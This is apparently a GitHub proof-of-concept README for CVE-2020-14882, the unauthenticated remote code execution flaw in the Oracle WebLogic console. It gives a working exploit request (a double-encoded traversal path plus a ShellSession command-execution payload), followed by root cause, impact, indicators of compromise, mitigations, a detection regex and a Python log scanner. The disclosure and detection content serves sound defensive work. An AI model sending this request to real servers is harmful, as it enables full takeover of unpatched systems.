
CVE-2020-14882 PoC — Oracle WebLogic Server Security Vulnerability

Associated Vulnerability
Title: Oracle WebLogic Server Security Vulnerability (CVE-2020-14882)
Description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Readme
# 🌐 **CVE-2020-14882 — Oracle WebLogic Server Remote Code Execution**

---

### 🧩 Overview

<img width="728" height="380" alt="CVE-2020-14882 overview image" src="https://github.com/user-attachments/assets/21da5932-f55a-45bd-b21c-377b59291980" />

**CVE-2020-14882** is a **critical unauthenticated Remote Code Execution (RCE)** vulnerability in **Oracle WebLogic Server’s Administration Console**.
An attacker can exploit it remotely — without any login credentials — using a specially crafted HTTP request to gain full control of the server.

* **Vendor:** Oracle
* **Component:** WebLogic Server Console
* **CVSS v3.1 Score:** 9.8 (Critical)
* **Disclosure Date:** October 2020
* **Attack Vector:** Network (HTTP request)
* **Authentication Required:** None

---

### ⚙️ Request

```
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: <Target IP>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 128

_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('ipconfig');");
```
<img width="1920" height="959" alt="CVE-2020-14882  oracle weblogic 1" src="https://github.com/user-attachments/assets/92bf111c-93ac-42d4-bd0a-bad7bcec69c6" />

<img width="1920" height="959" alt="CVE-2020-14882  oracle weblogic 2" src="https://github.com/user-attachments/assets/ea72ebcd-968b-4d38-b4fc-59ae45b9fea9" />

<img width="1920" height="959" alt="CVE-2020-14882  oracle weblogic 3" src="https://github.com/user-attachments/assets/86c40a84-a601-4bcb-8dca-e3fd21199a36" />

<img width="1920" height="957" alt="CVE-2020-14882  oracle weblogic 4" src="https://github.com/user-attachments/assets/5f078cef-e2ce-4156-aa06-eeae7f393c9d" />

<img width="1920" height="958" alt="CVE-2020-14882  oracle weblogic 5" src="https://github.com/user-attachments/assets/51136ef8-7a65-4d6b-ac5d-c70a9e643a3f" />

---

### ⚙️ Affected Versions

The following WebLogic Server versions are known to be vulnerable:

* 10.3.6.0.0
* 12.1.3.0.0
* 12.2.1.3.0
* 12.2.1.4.0
* 14.1.1.0.0

(Other patch levels or customized builds may also be at risk if not updated.)

---

### 🧠 Root Cause & Technical Details

The flaw lies in the **WebLogic Administration Console**’s improper input validation.
By sending a **specially crafted URL** with **double URL encoding**, an attacker can **bypass authentication and access internal server functions**.

Typical exploit path example:

```
/console/css/%252e%252e%252fconsole.portal
```

Here `%252e%252e%252f` is a **double-encoded directory traversal sequence**: one round of URL decoding turns it into `%2e%2e%2f`, a second into `../`. Because the path is checked before the second decoding step, the request slips past the authentication check and reaches sensitive console code.
Once that code is reachable, the request can trigger remote command execution or a webshell upload.

---

### 💣 Impact

* **Full remote code execution** with the privileges of the WebLogic process.
* **No authentication** required.
* **Complete system compromise** possible — attackers can deploy malware, steal data, or pivot deeper into the network.

Common exploitation results:

* Deployment of JSP-based **webshells**
* **Cryptomining** or **ransomware** installation
* **Persistence mechanisms** added to compromised systems

---

### 🕓 Timeline of Events

* **October 2020:** Oracle releases a Critical Patch Update addressing CVE-2020-14882.
* **Within days:** Public proof-of-concept (PoC) exploits appear online.
* **Following weeks:** Massive wave of exploitation observed — attackers scanning and exploiting exposed WebLogic servers globally.
* **Subsequent months:** Used in several major attack campaigns (cryptominers, ransomware, espionage).

---

### 🔍 Detection & Indicators of Compromise

**1. Access Logs**
Look for suspicious HTTP requests containing encoded traversal sequences such as:

```
%252e%252e%252fconsole
```

or

```
/console/css/.../console.portal
```

**2. File System Changes**

* Unrecognized `.jsp` files appearing under application directories.
* New or altered `.war` deployments.

**3. Process Activity**

* The WebLogic `java` process spawning shell commands (`/bin/sh`, `cmd.exe`).
* Unexpected outbound network connections from the WebLogic host.

**4. Persistence Artifacts**

* Suspicious scheduled tasks or startup scripts.
* Communication with mining pools or command-and-control servers.

---

### 🛡️ Mitigation & Remediation

**Immediate Actions:**

1. **Patch Immediately** — Apply Oracle’s October 2020 Critical Patch Update or later cumulative patches.
2. **Restrict Access** — Limit WebLogic Console access to trusted IPs or management networks only.
3. **Block Exploits** — Use a WAF or proxy rule to block requests containing encoded traversal patterns such as `%252e%252e%252f`.
4. **Disable Console** if not required in production.

**If Compromise Is Suspected:**

* Isolate the affected system from the network.
* Search logs and file systems for IOCs mentioned above.
* Rebuild the system from a known-good image.
* Rotate credentials and check for lateral movement.

---

### 🧰 Example Detection Pattern

Regular expression for scanning logs:

```
(%25(2e|2E)){2}%25(2f|2F)
```

This captures **double-encoded “../” traversal** attempts (`%252e%252e%252f`, in either letter case) often used in CVE-2020-14882 exploits. Each dot carries its own `%25` prefix, so the `{2}` quantifier must wrap the whole `%25(2e|2E)` group; the unwrapped form `%25(2e|2E){2}` would only match the string `%252e2e`, which never appears in real traffic.
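Below is an added example (not part of the README or the repository) that runs the access-log check from the Detection section and the regex above over a few constructed Apache/nginx combined-format log lines. It also normalizes the request path by percent-decoding it twice, so the single-encoded variant `%2e%2e/console.portal`, which the regex does not match, is still flagged. The log format and sample lines are assumptions for this example; WebLogic's own access log uses a different layout, so adjust `LOG_LINE` to your source.

```python
import re
import urllib.parse

# Double-encoded "../" as it appears in CVE-2020-14882 requests (%252e%252e%252f),
# in either letter case. Same pattern as the README's regex, with the group wrapped
# so that both dots carry their own %25 prefix.
DOUBLE_ENCODED_TRAVERSAL = re.compile(r"(%25(2e|2E)){2}%25(2f|2F)")

# Combined log line: host ident user [time] "METHOD target PROTO" status size ...
# Assumed format for this example, not a WebLogic log layout.
LOG_LINE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample traffic: two double-encoded console requests, two benign
# console requests, and one single-encoded traversal attempt.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Oct/2020:10:12:01 +0000] "POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1" 200 1512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [29/Oct/2020:10:12:03 +0000] "GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 200 988 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [29/Oct/2020:10:13:10 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3021 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [29/Oct/2020:10:13:12 +0000] "GET /console/css/console.css HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [29/Oct/2020:10:15:00 +0000] "GET /console/images/%2e%2e/console.portal HTTP/1.1" 404 0 "-" "curl/7.68.0"',
]


def decoded_path(target: str) -> str:
    """Percent-decode the request path twice so %252e%252e%252f becomes ../.
    The query string is dropped; only the path matters for this check."""
    path = target.split("?", 1)[0]
    return urllib.parse.unquote(urllib.parse.unquote(path))


def is_console_traversal(target: str) -> bool:
    """True when a request under /console/ carries a traversal sequence,
    whether raw, single-encoded or double-encoded."""
    if DOUBLE_ENCODED_TRAVERSAL.search(target):
        return True
    path = decoded_path(target).lower()
    return path.startswith("/console/") and "/../" in path


def scan(log_lines):
    """Return (host, method, target, status) for every line that looks like
    a CVE-2020-14882 console traversal attempt; unparsable lines are skipped."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if m is None:
            continue
        if is_console_traversal(m["target"]):
            hits.append((m["host"], m["method"], m["target"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for host, method, target, status in scan(SAMPLE_LOG):
        print(f"{host} {method} {target} -> {status}")
```

The status code is kept in each hit on purpose: a `200` on a traversal request to `console.portal` means the console accepted it and deserves a file-system and process review on that host, while a `404` or `403` is usually a blocked probe. Running the check on a decoded copy of the path is what lets the scan keep up with encoding variations that a single raw-string regex would miss.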

---

### 🧱 Defense-in-Depth Recommendations

* **Patch Management:** Keep WebLogic up to date and test patches before deployment.
* **Segmentation:** Keep administrative consoles off public networks.
* **Monitoring:** Enable detailed logging and feed data to your SIEM.
* **Incident Response Plan:** Prepare automated alerts for abnormal console access patterns.

---

### 🚨 Why It’s Important

CVE-2020-14882 remains a textbook example of a **critical enterprise RCE** — easy to exploit, devastating in impact, and widely weaponized.
It underscores the need for **prompt patching**, **network isolation of management interfaces**, and **continuous monitoring** for exploitation attempts.

---

File Snapshot

```
/data/pocs/f601023e64259cafe712b3aacbea300ed40807e7
└── README.md (6.2K)
```